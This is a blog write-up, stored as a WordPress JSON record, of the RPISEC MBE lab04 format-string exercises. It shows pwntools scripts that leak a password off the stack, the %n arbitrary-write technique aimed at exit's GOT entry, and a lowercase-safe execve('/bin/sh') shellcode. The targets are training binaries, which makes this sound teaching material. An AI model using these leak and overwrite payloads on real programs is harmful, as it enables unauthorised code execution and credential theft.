{"id":351,"date":"2018-02-07T08:42:06","date_gmt":"2018-02-07T08:42:06","guid":{"rendered":"https:\/\/devel0pment.de\/?p=351"},"modified":"2018-05-20T19:52:58","modified_gmt":"2018-05-20T19:52:58","slug":"rpisec-mbe-writeup-lab04-format-strings","status":"publish","type":"post","link":"https:\/\/devel0pment.de\/?p=351","title":{"rendered":"RPISEC\/MBE: writeup lab04 (Format Strings)"},"content":{"rendered":"<p>In the last lab, which writeup can be found <a href=\"https:\/\/devel0pment.de\/?p=317\">here<\/a>, we used publicly available shellcodes as well as shellcodes we had to write on our own, in order to exploit the provided binaries. In this writeup we proceed with the next lab, which focuses on the subject of <i>Format Strings<\/i>.<\/p>\n<p>As usual there are three levels ranging from C to A:<br \/>\n&#8211;&gt; <a href=\"https:\/\/devel0pment.de\/?p=351#lab4C\">lab4C<\/a><br \/>\n&#8211;&gt; <a href=\"https:\/\/devel0pment.de\/?p=351#lab4B\">lab4B<\/a><br \/>\n&#8211;&gt; <a href=\"https:\/\/devel0pment.de\/?p=351#lab4A\">lab4A<\/a><\/p>\n<p><!--more--><\/p>\n<hr \/>\n<h1 id=\"lab4C\">lab4C<\/h1>\n<p>We start by connecting to the first level of lab04 using the credentials <span style=\"color: #ff0000;\">lab4C<\/span> with the password <span style=\"color: #ff0000;\">lab04start<\/span>:<\/p>\n<pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\r\ngameadmin@warzone:~$ sudo ssh lab4C@localhost\r\nlab4C@localhost's password: (lab04start)\r\n        ____________________.___  _____________________________\r\n        \\______   \\______   \\   |\/   _____\/\\_   _____\/\\_   ___ \\\r\n         |       _\/|     ___\/   |\\_____  \\  |    __)_ \/    \\  \\\/\r\n         |    |   \\|    |   |   |\/        \\ |        \\\\     \\____\r\n         |____|_  \/|____|   |___\/_______  \/\/_______  \/ \\______  \/\r\n                \\\/                      \\\/         \\\/         \\\/\r\n __      __  _____ ____________________________    _______  
___________\r\n\/  \\    \/  \\\/  _  \\\\______   \\____    \/\\_____  \\   \\      \\ \\_   _____\/\r\n\\   \\\/\\\/   \/  \/_\\  \\|       _\/ \/     \/  \/   |   \\  \/   |   \\ |    __)_\r\n \\        \/    |    \\    |   \\\/     \/_ \/    |    \\\/    |    \\|        \\\r\n  \\__\/\\  \/\\____|__  \/____|_  \/_______ \\\\_______  \/\\____|__  \/_______  \/\r\n       \\\/         \\\/       \\\/        \\\/        \\\/         \\\/        \\\/\r\n\r\n        --------------------------------------------------------\r\n\r\n                       Challenges are in \/levels\r\n                   Passwords are in \/home\/lab*\/.pass\r\n            You can create files or work directories in \/tmp\r\n\r\n         -----------------&#x5B; contact@rpis.ec ]-----------------\r\n\r\nLast login: Sat Jan 27 06:07:38 2018 from localhost\r\n<\/pre>\n<p>Like in the last labs we have access to the source code of each level:<\/p>\n<pre class=\"brush: cpp; first-line: 0; gutter: false; highlight: [22,29,45,46,47,50,51,52,57,61]; title: ; notranslate\" title=\"\">\r\nlab4C@warzone:\/levels\/lab04$ cat lab4C.c\r\n\/*\r\n *   Format String Lab - C Problem\r\n *   gcc -z execstack -z norelro -fno-stack-protector -o lab4C lab4C.c\r\n *\/\r\n#include &lt;stdio.h&gt;\r\n#include &lt;stdlib.h&gt;\r\n#include &lt;string.h&gt;\r\n#include &lt;unistd.h&gt;\r\n\r\n#define PASS_LEN 30\r\n\r\nint main(int argc, char *argv&#x5B;])\r\n{\r\n    char username&#x5B;100] = {0};\r\n    char real_pass&#x5B;PASS_LEN] = {0};\r\n    char in_pass&#x5B;100] = {0};\r\n    FILE *pass_file = NULL;\r\n    int rsize = 0;\r\n\r\n    \/* open the password file *\/\r\n    pass_file = fopen(&quot;\/home\/lab4B\/.pass&quot;, &quot;r&quot;);\r\n    if (pass_file == NULL) {\r\n        fprintf(stderr, &quot;ERROR: failed to open password file\\n&quot;);\r\n        exit(EXIT_FAILURE);\r\n    }\r\n\r\n    \/* read the contents of the password file *\/\r\n    rsize = fread(real_pass, 1, PASS_LEN, pass_file);\r\n    
real_pass&#x5B;strcspn(real_pass, &quot;\\n&quot;)] = '&#92;&#48;';  \/\/ strip \\n\r\n    if (rsize != PASS_LEN) {\r\n        fprintf(stderr, &quot;ERROR: failed to read password file\\n&quot;);\r\n        exit(EXIT_FAILURE);\r\n    }\r\n\r\n    \/* close the password file *\/\r\n    fclose(pass_file);\r\n\r\n    puts(&quot;===== &#x5B; Secure Access System v1.0 ] =====&quot;);\r\n    puts(&quot;-----------------------------------------&quot;);\r\n    puts(&quot;- You must login to access this system. -&quot;);\r\n    puts(&quot;-----------------------------------------&quot;);\r\n\r\n    \/* read username securely *\/\r\n    printf(&quot;--&#x5B; Username: &quot;);\r\n    fgets(username, 100, stdin);\r\n    username&#x5B;strcspn(username, &quot;\\n&quot;)] = '&#92;&#48;';    \/\/ strip \\n\r\n\r\n    \/* read input password securely *\/\r\n    printf(&quot;--&#x5B; Password: &quot;);\r\n    fgets(in_pass, sizeof(in_pass), stdin);\r\n    in_pass&#x5B;strcspn(in_pass, &quot;\\n&quot;)] = '&#92;&#48;';      \/\/ strip \\n\r\n\r\n    puts(&quot;-----------------------------------------&quot;);\r\n\r\n    \/* log the user in if the password is correct *\/\r\n    if(!strncmp(real_pass, in_pass, PASS_LEN)){\r\n        printf(&quot;Greetings, %s!\\n&quot;, username);\r\n        system(&quot;\/bin\/sh&quot;);\r\n    } else {\r\n        printf(username);\r\n        printf(&quot; does not have access!\\n&quot;);\r\n        exit(EXIT_FAILURE);\r\n    }\r\n\r\n    return EXIT_SUCCESS;\r\n}\r\n<\/pre>\n<p>What does the program do?<br \/>\n&#8211;> The file <code>\/home\/lab4B\/.pass<\/code> is opened (line 22).<br \/>\n&#8211;> Its contents are stored in a buffer called <code>real_pass<\/code> (line 29).<br \/>\n&#8211;> The user can input a username (lines 45-47) and a password (lines 50-52).<br \/>\n&#8211;> If the password matches the real password (line 57), a shell is spawned (line 59).<br \/>\n&#8211;> If the password does not match, <code>printf<\/code> is called 
with <code>username<\/code> as its format string (line 61).<\/p>\n<p>As we already know from the lab&#8217;s subject, we are looking for some kind of format string vulnerability. A lot of C functions (for example <code>printf<\/code>, <code>fprintf<\/code> and <code>snprintf<\/code>) use format strings. The number of arguments passed to those functions is variable:<\/p>\n<pre class=\"brush: cpp; title: ; notranslate\" title=\"\">\r\nchar username&#x5B;] = &quot;admin&quot;;\r\nint id = 1337;\r\nprintf(&quot;hello %s, your id is: %d\\n&quot;, username, id);\r\n<\/pre>\n<p>In the example above, three arguments are passed to the function:<\/p>\n<ol>\n<li>The format string: <code>\"hello %s, your id is: %d\\n\"<\/code><\/li>\n<li>A string: <code>username<\/code><\/li>\n<li>An integer: <code>id<\/code><\/li>\n<\/ol>\n<p>The function <code>printf<\/code> simply processes the format string looking for format specifiers. When a format specifier is found, it takes the first element following the format string on the stack and inserts this element into the format string according to the chosen format specifier. 
When the next format specifier is found, the second element from the stack is inserted:<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2018\/02\/printf_01.png\" alt=\"\" width=\"756\" height=\"793\" class=\"alignnone size-full wp-image-358\" srcset=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2018\/02\/printf_01.png 756w, https:\/\/devel0pment.de\/wp-content\/uploads\/2018\/02\/printf_01-286x300.png 286w\" sizes=\"(max-width: 706px) 89vw, (max-width: 767px) 82vw, 740px\" \/><\/p>\n<pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\r\nlab4C@warzone:\/tmp$ .\/example\r\nhello admin, your id is: 1337\r\n<\/pre>\n<p>If there were another format specifier within the format string, the function would simply take the next element on the stack, regardless of whether a matching argument was actually passed:<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2018\/02\/printf_02.png\" alt=\"\" width=\"831\" height=\"264\" class=\"alignnone size-full wp-image-359\" srcset=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2018\/02\/printf_02.png 831w, https:\/\/devel0pment.de\/wp-content\/uploads\/2018\/02\/printf_02-300x95.png 300w, https:\/\/devel0pment.de\/wp-content\/uploads\/2018\/02\/printf_02-768x244.png 768w\" sizes=\"(max-width: 767px) 89vw, (max-width: 1000px) 54vw, (max-width: 1071px) 543px, 580px\" \/><\/p>\n<p>When we can control the format string, we can insert format specifiers which will leak elements stored on the stack.<\/p>\n<p>In the code above on line 61 <code>printf<\/code> is called with the first argument (the format string) being a string the user provided (<code>username<\/code>). 
Thus we can use the username to leak items on the stack:<\/p>\n<pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\r\nlab4C@warzone:\/levels\/lab04$ .\/lab4C\r\n===== &#x5B; Secure Access System v1.0 ] =====\r\n-----------------------------------------\r\n- You must login to access this system. -\r\n-----------------------------------------\r\n--&#x5B; Username: test%d\r\n--&#x5B; Password: test\r\n-----------------------------------------\r\ntest-1073744446 does not have access!\r\nlab4C@warzone:\/levels\/lab04$\r\n<\/pre>\n<p>After entering <code>test<b>%d<\/b><\/code>, <code>printf<\/code> expects the next item on the stack to be an integer and inserts it into the string: <code>test<b>-1073744446<\/b><\/code>.<\/p>\n<p>As we already know, the password we are looking for is kindly stored in a local variable on the stack (<code>real_pass<\/code>). Thus we only need to leak enough items from the stack until the password is read.<\/p>\n<p>Very handy for this task is the argument selector <code>$<\/code>. 
With <code>$<\/code> the argument to be printed can be selected by its position on the stack:<\/p>\n<pre class=\"brush: cpp; title: ; notranslate\" title=\"\">\r\n#include &lt;stdio.h&gt;\r\n\r\nint main() {\r\n  char c1 = 'A';\r\n  char c2 = 'B';\r\n  char c3 = 'C';\r\n  \r\n  printf(&quot;%2$c %3$c %1$c\\n&quot;, c1, c2, c3);\r\n  \r\n  return 0;\r\n}\r\n<\/pre>\n<p>Running this example will print <code>B<\/code>, <code>C<\/code>, <code>A<\/code> instead of <code>A<\/code>, <code>B<\/code>, <code>C<\/code>:<\/p>\n<pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\r\nlab4C@warzone:\/levels\/lab04$ .\/example2\r\nB C A\r\n<\/pre>\n<p>Because the local variable <code>username<\/code> is limited to 100 bytes, we can write a Python script which runs the program multiple times and iterates over the items on the stack:<\/p>\n<pre class=\"brush: python; first-line: 0; highlight: [8,10]; title: ; notranslate\" title=\"\">\r\nlab4C@warzone:\/levels\/lab04$ cat \/tmp\/exploit_lab4C.py\r\nfrom pwn import *\r\n\r\nfor i in range(1, 40, 10):\r\n  p = process(&quot;.\/lab4C&quot;)\r\n  line = &quot;&quot;\r\n  for j in range(10):\r\n    line += &quot;%&quot;+str(i+j)+&quot;$08x &quot;\r\n\r\n  p.sendline(line)\r\n  p.sendline(&quot;pass&quot;)\r\n  print(p.recv(2000))\r\n<\/pre>\n<p>The script runs the program 4 times, passing a format string (line 8, line 10) which prints 10 items on the stack each time. 
The format specifier <code>%n$08x<\/code> prints the n-th item on the stack as a hex value (<code>x<\/code>) padded with leading zeros to 8 characters (<code>08<\/code>):<\/p>\n<pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\r\nlab4C@warzone:\/levels\/lab04$ python \/tmp\/exploit_lab4C.py\r\n&#x5B;+] Starting program '.\/lab4C': Done\r\n&#x5B;*] Program '.\/lab4C' stopped with exit code 1\r\n===== &#x5B; Secure Access System v1.0 ] =====\r\n-----------------------------------------\r\n- You must login to access this system. -\r\n-----------------------------------------\r\n--&#x5B; Username: --&#x5B; Password: -----------------------------------------\r\nbffff5c2 0000001e 0804a008 61700000 00007373 00000000 00000000 00000000 00000000 00000000  does not have access!\r\n\r\n&#x5B;+] Starting program '.\/lab4C': Done\r\n&#x5B;*] Program '.\/lab4C' stopped with exit code 1\r\n===== &#x5B; Secure Access System v1.0 ] =====\r\n-----------------------------------------\r\n- You must login to access this system. -\r\n-----------------------------------------\r\n--&#x5B; Username: --&#x5B; Password: -----------------------------------------\r\n00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000  does not have access!\r\n\r\n&#x5B;+] Starting program '.\/lab4C': Done\r\n&#x5B;*] Program '.\/lab4C' stopped with exit code 1\r\n===== &#x5B; Secure Access System v1.0 ] =====\r\n-----------------------------------------\r\n- You must login to access this system. 
-\r\n-----------------------------------------\r\n--&#x5B; Username: --&#x5B; Password: -----------------------------------------\r\n00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 75620000 74315f37  does not have access!\r\n\r\n&#x5B;+] Starting program '.\/lab4C': Done\r\n&#x5B;*] Program '.\/lab4C' stopped with exit code 1\r\n===== &#x5B; Secure Access System v1.0 ] =====\r\n-----------------------------------------\r\n- You must login to access this system. -\r\n-----------------------------------------\r\n--&#x5B; Username: --&#x5B; Password: -----------------------------------------\r\n7334775f 625f376e 33745572 7230665f 62343363 00216531 24313325 20783830 24323325 20783830  does not have access!\r\n\r\n<\/pre>\n<p>We only need to extract the password from the local variable <code>real_pass<\/code> now. The output from the last two calls looks like ASCII:<\/p>\n<pre>\r\n00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 <span style=\"color:#ff0000;\">75620000 74315f37<\/span>  does not have access!\r\n<span style=\"color:#ff0000;\">7334775f 625f376e 33745572 7230665f 62343363 <u>00<\/u>216531<\/span> 24313325 20783830 24323325 20783830  does not have access!\r\n<\/pre>\n<p>In the second line there is a null-byte terminating the string. 
The following Python script contains the concatenated bytes and converts them from little endian to the final string:<\/p>\n<pre class=\"brush: python; first-line: 0; title: ; notranslate\" title=\"\">\r\nlab4C@warzone:\/levels\/lab04$ cat \/tmp\/convertPwd_lab4C.py\r\n\r\npwd_le = &quot;7562000074315f377334775f625f376e337455727230665f6234336300216531&quot;\r\n\r\npwd  = &quot;&quot;\r\n\r\nfor i in range(0, len(pwd_le), 8):\r\n  # the 4 byte values are stored in little endian\r\n  pwd += pwd_le&#x5B;i+6:i+8] + pwd_le&#x5B;i+4:i+6] + pwd_le&#x5B;i+2:i+4] + pwd_le&#x5B;i:i+2]\r\n\r\nprint(pwd)\r\nprint(pwd.decode(&quot;hex&quot;))\r\n<\/pre>\n<p>Running the script yields the password:<\/p>\n<pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\r\nlab4C@warzone:\/levels\/lab04$ python \/tmp\/create_lab4C.py\r\n00006275375f31745f7734736e375f62725574335f6630726333346231652100\r\nbu7_1t_w4sn7_brUt3_f0rc34b1e!\r\n<\/pre>\n<p>Done \ud83d\ude42 The password for the next level is <code>bu7_1t_w4sn7_brUt3_f0rc34b1e!<\/code>.<\/p>\n<p>We could use these credentials as the password input for the program in order to get a shell, but the password is all we need for now \ud83d\ude09<\/p>\n<hr \/>\n<h1 id=\"lab4B\">lab4B<\/h1>\n<p>We connect to the next level using the previously gained credentials <span style=\"color: #ff0000;\">lab4B<\/span> with the password <span style=\"color: #ff0000;\">bu7_1t_w4sn7_brUt3_f0rc34b1e!<\/span>:<\/p>\n<pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\r\ngameadmin@warzone:~$ sudo ssh lab4B@localhost\r\nlab4B@localhost's password: (bu7_1t_w4sn7_brUt3_f0rc34b1e!)\r\n        ____________________.___  _____________________________\r\n        \\______   \\______   \\   |\/   _____\/\\_   _____\/\\_   ___ \\\r\n         |       _\/|     ___\/   |\\_____  \\  |    __)_ \/    \\  \\\/\r\n         |    |   \\|    |   |   |\/        \\ |        \\\\     \\____\r\n         |____|_  \/|____|   
|___\/_______  \/\/_______  \/ \\______  \/\r\n                \\\/                      \\\/         \\\/         \\\/\r\n __      __  _____ ____________________________    _______  ___________\r\n\/  \\    \/  \\\/  _  \\\\______   \\____    \/\\_____  \\   \\      \\ \\_   _____\/\r\n\\   \\\/\\\/   \/  \/_\\  \\|       _\/ \/     \/  \/   |   \\  \/   |   \\ |    __)_\r\n \\        \/    |    \\    |   \\\/     \/_ \/    |    \\\/    |    \\|        \\\r\n  \\__\/\\  \/\\____|__  \/____|_  \/_______ \\\\_______  \/\\____|__  \/_______  \/\r\n       \\\/         \\\/       \\\/        \\\/        \\\/         \\\/        \\\/\r\n\r\n        --------------------------------------------------------\r\n\r\n                       Challenges are in \/levels\r\n                   Passwords are in \/home\/lab*\/.pass\r\n            You can create files or work directories in \/tmp\r\n\r\n         -----------------&#x5B; contact@rpis.ec ]-----------------\r\nLast login: Sun Jan 21 15:08:34 2018 from localhost\r\n<\/pre>\n<p>And start analysing the provided source code:<\/p>\n<pre class=\"brush: cpp; first-line: 0; highlight: [15,18,19,20,23]; title: ; notranslate\" title=\"\">\r\nlab4B@warzone:\/levels\/lab04$ cat lab4B.c\r\n\/*\r\n *   Format String Lab - B Problem\r\n *   gcc -z execstack -z norelro -fno-stack-protector -o lab4B lab4B.c\r\n *\/\r\n#include &lt;stdio.h&gt;\r\n#include &lt;stdlib.h&gt;\r\n#include &lt;string.h&gt;\r\n\r\nint main(int argc, char *argv&#x5B;])\r\n{\r\n    int i = 0;\r\n    char buf&#x5B;100];\r\n\r\n    \/* read user input securely *\/\r\n    fgets(buf, 100, stdin);\r\n\r\n    \/* convert string to lowercase *\/\r\n    for (i = 0; i &lt; strlen(buf); i++)\r\n        if (buf&#x5B;i] &gt;= 'A' &amp;&amp; buf&#x5B;i] &lt;= 'Z')\r\n            buf&#x5B;i] = buf&#x5B;i] ^ 0x20;\r\n\r\n    \/* print out our nice and new lowercase string *\/\r\n    printf(buf);\r\n\r\n    exit(EXIT_SUCCESS);\r\n    return EXIT_FAILURE;\r\n}\r\n<\/pre>\n<p>What 
does the program do?<br \/>\n&#8211;> On line 15 <code>fgets<\/code> is called, reading 100 bytes into a local variable called <code>buf<\/code>.<br \/>\n&#8211;> In the for-loop on lines 18-20 all upper-case characters are converted to lower-case.<br \/>\n&#8211;> The adjusted user input is printed using <code>printf<\/code> (line 23).<\/p>\n<p>As in the last level, we control a string which is passed as a format string to <code>printf<\/code>. This time the string is converted to lower-case before being passed to <code>printf<\/code>, but that should not do too much harm. The main difference compared to the last level is that the password we are looking for is unfortunately not stored in a local variable on the stack. Thus we cannot just leak the password.<\/p>\n<p>In order to exploit the program another handy feature of format strings comes into play: the format specifier <code>%n<\/code>. When placed in a format string, <code>%n<\/code> writes the number of bytes printed so far to the variable whose address is passed as the corresponding argument on the stack:<\/p>\n<pre class=\"brush: cpp; title: ; notranslate\" title=\"\">\r\n#include &lt;stdio.h&gt;\r\n\r\nint main() {\r\n  unsigned int len = 0;\r\n  \r\n  printf(&quot;testing with%n n-specifier\\n&quot;, &amp;len);\r\n  \r\n  printf(&quot;bytes printed by last printf so far: %d\\n&quot;, len);\r\n  \r\n  return 0;\r\n  \r\n}\r\n<\/pre>\n<p>Running the example:<\/p>\n<pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\r\nlab4B@warzone:\/tmp$ .\/example\r\ntesting with n-specifier\r\nbytes printed by last printf so far: 12\r\n<\/pre>\n<p>As we can see, the value <code>12<\/code> is written to the local variable <code>len<\/code>. <code>12<\/code> is the number of characters printed before the <code>%n<\/code> specifier: <code>len(\"testing with\") = 12<\/code>.<\/p>\n<p>This format specifier can be abused to write arbitrary data to an arbitrary address! 
We will get to this later.<\/p>\n<p>First we need to know where on the stack the buffer we can write to (<code>buf<\/code>) is located. This can be done by putting a pattern into the buffer, followed by a few format specifiers which leak the stack:<\/p>\n<pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\r\nlab4B@warzone:\/levels\/lab04$ .\/lab4B\r\naaaa.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x\r\naaaa.00000064.b7fcdc20.00000000.bffff704.bffff678.61616161.3830252e.30252e78.252e7838\r\n<\/pre>\n<p>The input begins with <code>aaaa<\/code>, which equals <code>61616161<\/code> in hex. As we can see, the 6th item on the stack is the beginning of our buffer. We can verify this by using the argument selector:<\/p>\n<pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\r\nlab4B@warzone:\/levels\/lab04$ .\/lab4B\r\naaaa.%6$08x\r\naaaa.61616161\r\n<\/pre>\n<p>Thus the arguments on the stack look like this when <code>printf<\/code> is entered:<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2018\/02\/printf_03.png\" alt=\"\" width=\"453\" height=\"340\" class=\"alignnone size-full wp-image-360\" srcset=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2018\/02\/printf_03.png 453w, https:\/\/devel0pment.de\/wp-content\/uploads\/2018\/02\/printf_03-300x225.png 300w\" sizes=\"(max-width: 453px) 100vw, 453px\" \/><\/p>\n<p>As the stack is executable and we control a long enough buffer (100 bytes), we can store a shellcode in this buffer. In lab03 we executed our shellcode by overwriting the return address on the stack. Reconsider the last lines of the source code:<\/p>\n<pre class=\"brush: cpp; first-line: 26; title: ; notranslate\" title=\"\">\r\n    exit(EXIT_SUCCESS);\r\n    return EXIT_FAILURE;\r\n}\r\n<\/pre>\n<p>Before the <code>main<\/code> function returns, <code>exit<\/code> is called. 
This will directly terminate the program and the <code>return<\/code> instruction never gets reached. Thus our shellcode would not be executed if we overwrote the return address. We have to write the address of our shellcode somewhere else.<\/p>\n<p>In this case we can use the function call to <code>exit<\/code> in order to redirect the control flow. We will not go into the details for now. All you need to know is that calls to library functions are made through the Procedure Linkage Table (PLT), which reads the target address from the Global Offset Table (GOT):<\/p>\n<pre class=\"brush: bash; gutter: false; highlight: [1,10,13,17]; title: ; notranslate\" title=\"\">\r\n&#x5B;0x08048590]&gt; pdf @ main\r\n\u2552 (fcn) sym.main 276\r\n\u2502           ; DATA XREF from 0x080485a7 (entry0)\r\n\u2502           ;-- main:\r\n\u2502           ;-- sym.main:\r\n\u2502           0x0804868d    55             push ebp\r\n\u2502           0x0804868e    89e5           mov ebp, esp\r\n...\r\n\u2502           0x08048729    c70424000000.  mov dword &#x5B;esp], 0\r\n\u2502           0x08048730    e82bfeffff     call sym.imp.exit ;sym.imp.exit()\r\n...\r\n\r\n&#x5B;0x080486a4]&gt; pdf @ sym.imp.exit\r\n\u2552 (fcn) sym.imp.exit 6\r\n\u2502          ; CALL XREF from 0x08048730 (sym.main)\r\n\u2502          ;-- sym.imp.exit:\r\n\u2502          0x08048560    ff25b8990408   jmp dword &#x5B;reloc.exit_184]     ; &quot;f...v.......&quot; @ 0x80499b8\r\n&#x5B;0x080486a4]&gt;\r\n<\/pre>\n<p>As we can see in the output above, <code>exit<\/code> is called via the symbol <code>sym.imp.exit<\/code> (<code>0x08048560<\/code>). This address is the <code>exit<\/code> entry within the PLT and contains a jump to the address stored at <code>reloc.exit_184<\/code>, which is the GOT entry of <code>exit<\/code>. 
This means that, when <code>exit<\/code> is called, execution will proceed at the address stored at <code>reloc.exit_184<\/code> (<code>0x80499b8<\/code>).<\/p>\n<p>If we write the address of our shellcode to that address, our shellcode will be executed when the function <code>exit<\/code> is called.<\/p>\n<p>Summing it up, we need to do the following:<br \/>\n&#8211;> Store a shellcode in the buffer.<br \/>\n&#8211;> Abuse the <code>%n<\/code> specifier to write the address of our shellcode to the GOT entry of <code>exit<\/code>.<\/p>\n<h2>shellcode<\/h2>\n<p>Basically we can reuse the shellcode from lab03, which makes a <code>sys_execve<\/code> syscall passing <code>\/bin\/sh<\/code> as argument.<\/p>\n<p>One point we have to consider is that the string we enter is converted to lower-case before being passed to <code>printf<\/code>. Thus our shellcode cannot contain bytes between <code>0x41<\/code> (<code>A<\/code>) and <code>0x5A<\/code> (<code>Z<\/code>). So we have to adjust the shellcode we used a little bit:<\/p>\n<pre class=\"brush: cpp; highlight: [2,3,4]; title: ; notranslate\" title=\"\">\r\n31 c0                 xor    eax, eax\r\n;50                    push   eax\r\n83 ec 04              sub    esp, 0x4\r\n89 04 24              mov    &#x5B;esp], eax\r\n68 2f 2f 73 68        push   0x68732f2f\r\n68 2f 62 69 6e        push   0x6e69622f\r\n89 e3                 mov    ebx, esp\r\n89 c1                 mov    ecx, eax\r\n89 c2                 mov    edx, eax\r\nb0 0b                 mov    al, 0xb\r\ncd 80                 int    0x80\r\n31 c0                 xor    eax, eax\r\n40                    inc    eax\r\ncd 80                 int    0x80\r\n<\/pre>\n<p>The instruction <code>push eax<\/code> (<code>0x50<\/code>) would be converted to lower-case and thus be destroyed. As there are plenty of ways of doing things on x86, we can simply replace this instruction with two new instructions: <code>sub esp, 0x4<\/code> and <code>mov [esp], eax<\/code>. 
This will do the same as <code>push eax<\/code>.<\/p>\n<h2>%n specifier<\/h2>\n<p>As I have already mentioned, the <code>%n<\/code> specifier can be used to write arbitrary data to an arbitrary address. We will now see how this works and use it to write the address of our shellcode into the GOT entry of <code>exit<\/code>.<\/p>\n<p>In the example earlier in this writeup, we have seen that <code>%n<\/code> expects the address of an unsigned integer and writes the count of characters printed so far to this address. As we have also seen, we can use the argument selector <code>$<\/code> to select a specific argument. If the string we entered contains the address we want to write to, we can simply select this address with the argument selector <code>$<\/code> and write the count of characters printed so far with the <code>%n<\/code> specifier.<\/p>\n<p>So for now we can write to an arbitrary address. But how do we control what value we write? Since the count of characters printed is written, we must simply print as many characters as the value we want to write. This can be done easily by using the padding mechanism of a format string, which we already used: the format specifier <code>%8x<\/code> pads the value to 8 characters. 
If we use <code>%1000x<\/code> the value is padded to 1000 characters.<\/p>\n<p>We already determined the address where we want to write to (the GOT entry of <code>exit<\/code>): <code>0x80499b8<\/code>.<\/p>\n<p>We still need the address of our shellcode (the address of <code>buf<\/code> on the stack):<\/p>\n<pre class=\"brush: bash; gutter: false; highlight: [1,3,10,11,16]; title: ; notranslate\" title=\"\">\r\nlab4B@warzone:\/levels\/lab04$ gdb lab4B\r\nReading symbols from lab4B...(no debugging symbols found)...done.\r\ngdb-peda$ disassemble main\r\nDump of assembler code for function main:\r\n   0x0804868d &lt;+0&gt;:     push   ebp\r\n   0x0804868e &lt;+1&gt;:     mov    ebp,esp\r\n   0x08048690 &lt;+3&gt;:     push   ebx\r\n   ...\r\n   0x080486b0 &lt;+35&gt;:    lea    eax,&#x5B;esp+0x18]\r\n   0x080486b4 &lt;+39&gt;:    mov    DWORD PTR &#x5B;esp],eax\r\n   0x080486b7 &lt;+42&gt;:    call   0x8048540 &lt;fgets@plt&gt;\r\n   ...\r\n   0x08048729 &lt;+156&gt;:   mov    DWORD PTR &#x5B;esp],0x0\r\n   0x08048730 &lt;+163&gt;:   call   0x8048560 &lt;exit@plt&gt;\r\nEnd of assembler dump.\r\ngdb-peda$ b *main+42\r\nBreakpoint 1 at 0x80486b7\r\n<\/pre>\n<p>As the buffer <code>buf<\/code> is passed as an argument to <code>fgets<\/code> we simply set a breakpoint before the call and inspect the stack when the breakpoint is hit:<\/p>\n<pre class=\"brush: bash; gutter: false; highlight: [1,18,28]; title: ; notranslate\" title=\"\">\r\ngdb-peda$ r\r\nStarting program: \/levels\/lab04\/lab4B\r\n&#x5B;----------------------------------registers-----------------------------------]\r\nEAX: 0xbffff6a8 --&gt; 0xbffff6c0 --&gt; 0xffffffff\r\nEBX: 0xb7fcd000 --&gt; 0x1a9da8\r\nECX: 0x859c4868\r\nEDX: 0xbffff744 --&gt; 0xb7fcd000 --&gt; 0x1a9da8\r\nESI: 0x0\r\nEDI: 0x0\r\nEBP: 0xbffff718 --&gt; 0x0\r\nESP: 0xbffff690 --&gt; 0xbffff6a8 --&gt; 0xbffff6c0 --&gt; 0xffffffff\r\nEIP: 0x80486b7 (&lt;main+42&gt;:      call   0x8048540 &lt;fgets@plt&gt;)\r\nEFLAGS: 0x287 (CARRY PARITY 
adjust zero SIGN trap INTERRUPT direction overflow)\r\n&#x5B;-------------------------------------code-------------------------------------]\r\n   0x80486a8 &lt;main+27&gt;: mov    DWORD PTR &#x5B;esp+0x4],0x64\r\n   0x80486b0 &lt;main+35&gt;: lea    eax,&#x5B;esp+0x18]\r\n   0x80486b4 &lt;main+39&gt;: mov    DWORD PTR &#x5B;esp],eax\r\n=&gt; 0x80486b7 &lt;main+42&gt;: call   0x8048540 &lt;fgets@plt&gt;\r\n   0x80486bc &lt;main+47&gt;: mov    DWORD PTR &#x5B;esp+0x7c],0x0\r\n   0x80486c4 &lt;main+55&gt;: jmp    0x8048709 &lt;main+124&gt;\r\n   0x80486c6 &lt;main+57&gt;: lea    edx,&#x5B;esp+0x18]\r\n   0x80486ca &lt;main+61&gt;: mov    eax,DWORD PTR &#x5B;esp+0x7c]\r\nGuessed arguments:\r\narg&#x5B;0]: 0xbffff6a8 --&gt; 0xbffff6c0 --&gt; 0xffffffff\r\narg&#x5B;1]: 0x64 ('d')\r\narg&#x5B;2]: 0xb7fcdc20 --&gt; 0xfbad2088\r\n&#x5B;------------------------------------stack-------------------------------------]\r\n0000| 0xbffff690 --&gt; 0xbffff6a8 --&gt; 0xbffff6c0 --&gt; 0xffffffff\r\n0004| 0xbffff694 --&gt; 0x64 ('d')\r\n0008| 0xbffff698 --&gt; 0xb7fcdc20 --&gt; 0xfbad2088\r\n0012| 0xbffff69c --&gt; 0x0\r\n0016| 0xbffff6a0 --&gt; 0xbffff754 --&gt; 0xbde68c78\r\n0020| 0xbffff6a4 --&gt; 0xbffff6c8 --&gt; 0xb7e2fbf8 --&gt; 0x2aa0\r\n0024| 0xbffff6a8 --&gt; 0xbffff6c0 --&gt; 0xffffffff\r\n0028| 0xbffff6ac --&gt; 0x80483a9 (&quot;__libc_start_main&quot;)\r\n&#x5B;------------------------------------------------------------------------------]\r\nLegend: code, data, rodata, value\r\n\r\nBreakpoint 1, 0x080486b7 in main ()\r\ngdb-peda$\r\n<\/pre>\n<p>The address <code>0xbffff6a8<\/code> is on top of the stack. This will be the address where we store our shellcode. 
